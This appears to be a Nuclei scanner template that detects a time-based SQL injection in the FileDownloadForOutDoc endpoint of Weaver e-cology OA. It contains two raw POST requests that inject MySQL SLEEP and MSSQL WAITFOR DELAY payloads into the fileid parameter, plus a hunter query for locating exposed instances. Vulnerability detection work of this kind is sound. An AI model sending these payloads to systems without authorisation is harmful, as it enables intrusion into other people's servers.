id: ecology-filedownloadforoutdoc-sqli

info:
  name: EcologyOA filedownloadforoutdoc - SQL injection
  author: Co5mos
  severity: critical
  description: EcologyOA filedownloadforoutdoc interface has SQL injection
  reference:
    - https://blog.csdn.net/2301_79099363/article/details/131692158
  metadata:
    max-request: 2
    verified: true
    hunter-query: product.name="泛微 e-cology 9.0 OA"
  tags: ecology-oa,sqli

variables:
  num: '{{rand_int(10, 99)}}'

http:
  - raw:
      - |
        @timeout: 10s
        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close        

        fileid={{num}}+AND+(SELECT+6196+FROM+(SELECT(SLEEP(5)))ovuM)#+xrbN&isFromOutImg=1

      - |
        @timeout: 10s
        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close        

        fileid={{num}}+WAITFOR DELAY+'0:0:5'&isFromOutImg=1

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
        condition: and
